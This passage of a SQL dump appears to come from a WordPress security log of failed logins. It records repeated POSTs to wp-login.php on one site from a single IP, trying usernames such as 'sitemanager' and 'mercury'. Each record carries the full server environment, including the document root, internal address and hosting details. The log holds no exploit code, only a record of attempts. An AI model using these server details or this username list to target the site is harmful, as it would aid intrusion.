04:24:38'),(94842,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"119\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51540\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"119\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139523.35812;s:12:\"REQUEST_TIME\";i:1746139523;}}','196.251.112.104',1,'2025-05-02 04:15:25','2025-05-03 04:24:38'),(94843,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51542\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139523.379535;s:12:\"REQUEST_TIME\";i:1746139523;}}','196.251.112.104',1,'2025-05-02 04:15:25','2025-05-03 04:24:38'),(94844,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"125\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51536\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"125\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139523.322366;s:12:\"REQUEST_TIME\";i:1746139523;}}','196.251.112.104',1,'2025-05-02 04:15:25','2025-05-03 04:24:38'),(94845,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51420\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139710.971998;s:12:\"REQUEST_TIME\";i:1746139710;}}','196.251.112.104',1,'2025-05-02 04:18:32','2025-05-03 04:24:38'),(94846,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"124\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51419\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"124\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139710.962852;s:12:\"REQUEST_TIME\";i:1746139710;}}','196.251.112.104',1,'2025-05-02 04:18:32','2025-05-03 04:24:38'),(94847,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51422\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139711.02969;s:12:\"REQUEST_TIME\";i:1746139711;}}','196.251.112.104',1,'2025-05-02 04:18:32','2025-05-03 04:24:38'),(94848,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51423\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139711.0962639;s:12:\"REQUEST_TIME\";i:1746139711;}}','196.251.112.104',1,'2025-05-02 04:18:32','2025-05-03 04:24:38'),(94849,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51424\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139711.1225641;s:12:\"REQUEST_TIME\";i:1746139711;}}','196.251.112.104',1,'2025-05-02 04:18:32','2025-05-03 04:24:38'),(94850,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51263\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139904.8151369;s:12:\"REQUEST_TIME\";i:1746139904;}}','196.251.112.104',1,'2025-05-02 04:21:46','2025-05-03 04:24:38'),(94851,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"119\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51262\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"119\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139904.812304;s:12:\"REQUEST_TIME\";i:1746139904;}}','196.251.112.104',1,'2025-05-02 04:21:46','2025-05-03 04:24:38'),(94852,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"119\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51264\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"119\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139904.844152;s:12:\"REQUEST_TIME\";i:1746139904;}}','196.251.112.104',1,'2025-05-02 04:21:46','2025-05-03 04:24:38'),(94853,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51265\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139904.844852;s:12:\"REQUEST_TIME\";i:1746139904;}}','196.251.112.104',1,'2025-05-02 04:21:46','2025-05-03 